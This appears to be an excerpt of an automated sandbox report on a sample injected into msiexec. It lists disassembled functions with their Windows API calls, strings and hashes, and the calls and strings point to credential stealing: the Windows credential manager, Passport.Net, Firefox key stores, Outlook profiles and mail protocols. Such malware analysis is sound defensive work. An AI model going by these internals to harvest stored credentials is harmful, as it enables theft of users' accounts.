                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                          • memset.MSVCRT ref: 00410246
                                                                                                          • memset.MSVCRT ref: 00410258
                                                                                                            • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                          • memset.MSVCRT ref: 0041033F
                                                                                                          • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                          • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3974772901-0
                                                                                                          • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                          • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                          • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                          • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                          APIs
                                                                                                          • wcslen.MSVCRT ref: 0044406C
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                          • strlen.MSVCRT ref: 004440D1
                                                                                                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                          • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 577244452-0
                                                                                                          • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                          • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                          • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                          • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                                          • _strcmpi.MSVCRT ref: 00404536
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                          • String ID: imap$pop3$smtp
                                                                                                          • API String ID: 2025310588-821077329
                                                                                                          • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                          • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040C02D
                                                                                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                            • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                            • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                          • API String ID: 2726666094-3614832568
                                                                                                          • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                          • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                          • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                          • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                          APIs
                                                                                                          • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                            • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                          • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                          • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                          • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcmp$memcpy
                                                                                                          • String ID: global-salt$password-check
                                                                                                          • API String ID: 231171946-3927197501
                                                                                                          • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                          • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                          • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                          • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                          APIs
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??3@
                                                                                                          • String ID:
                                                                                                          • API String ID: 613200358-0
                                                                                                          • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                          • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                          • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                          • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                          • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 19018683-0
                                                                                                          • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                          • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                          • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                          • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040644F
                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                            • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 438689982-0
                                                                                                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                          • strlen.MSVCRT ref: 0040F7BE
                                                                                                          • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                          • String ID: Passport.Net\*
                                                                                                          • API String ID: 2329438634-3671122194
                                                                                                          • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                          • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                          • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                          • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                          APIs
                                                                                                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                          • memset.MSVCRT ref: 0040330B
                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                          • strchr.MSVCRT ref: 0040335A
                                                                                                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                          • strlen.MSVCRT ref: 0040339C
                                                                                                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                          • String ID: Personalities
                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                          • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                          • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: H
                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                          • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                          • API String ID: 3510742995-3170954634
                                                                                                          • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                          • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                          • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                          • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memset
                                                                                                          • String ID: winWrite1$winWrite2
                                                                                                          • API String ID: 438689982-3457389245
                                                                                                          • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                          • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                          • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                          • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpymemset
                                                                                                          • String ID: winRead
                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0044955B
                                                                                                          • memset.MSVCRT ref: 0044956B
                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpymemset
                                                                                                          • String ID: gj
                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                          APIs
                                                                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                          • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                          • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 1189762176-0
                                                                                                          • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                          • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                          • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                          • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 004090C2
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                          • String ID:
                                                                                                          • API String ID: 4247780290-0
                                                                                                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                            • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                            • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                          • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                          • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2775283111-0
                                                                                                          • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                          • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                          • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                          • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                          APIs
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                          • API String ID: 885266447-2471937615
                                                                                                          • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                          • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                          • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
